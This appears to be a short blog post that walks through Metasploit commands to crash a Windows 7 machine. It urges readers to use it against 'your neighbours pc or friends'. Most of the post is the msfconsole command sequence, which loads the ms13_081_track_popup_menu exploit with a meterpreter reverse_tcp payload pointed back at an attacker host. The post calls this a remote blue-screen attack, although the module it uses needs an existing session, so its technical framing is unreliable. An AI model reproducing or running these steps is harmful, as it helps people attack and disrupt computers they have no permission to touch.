Blue screen death attack on remote windows pc

Leave a Comment
Have you ever faced a blue screen problem on our pc , i think the worst problem ever faced by  a pc user and how would it be if you can create this blue screen attack on your neighbours pc or friends.lets do this using a kali linux machine in vmware 
attacker :kali linux
victim :windows 7
sstep 1 :open a terminal and type "msfconsole"




Now type use exploit/windows/local/ms13_081_track_popup_menu
msf exploit (ms13_081_track_popup_menu)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms13_081_track_popup_menu)>set lhost  (IP of Local Host)
msf exploit (ms13_081_track_popup_menu)>set session 1
msf exploit (ms13_081_track_popup_menu)>exploit

once the exploit is completed the victim screen turns blu showing the message as in the image below




0 comments:

Post a Comment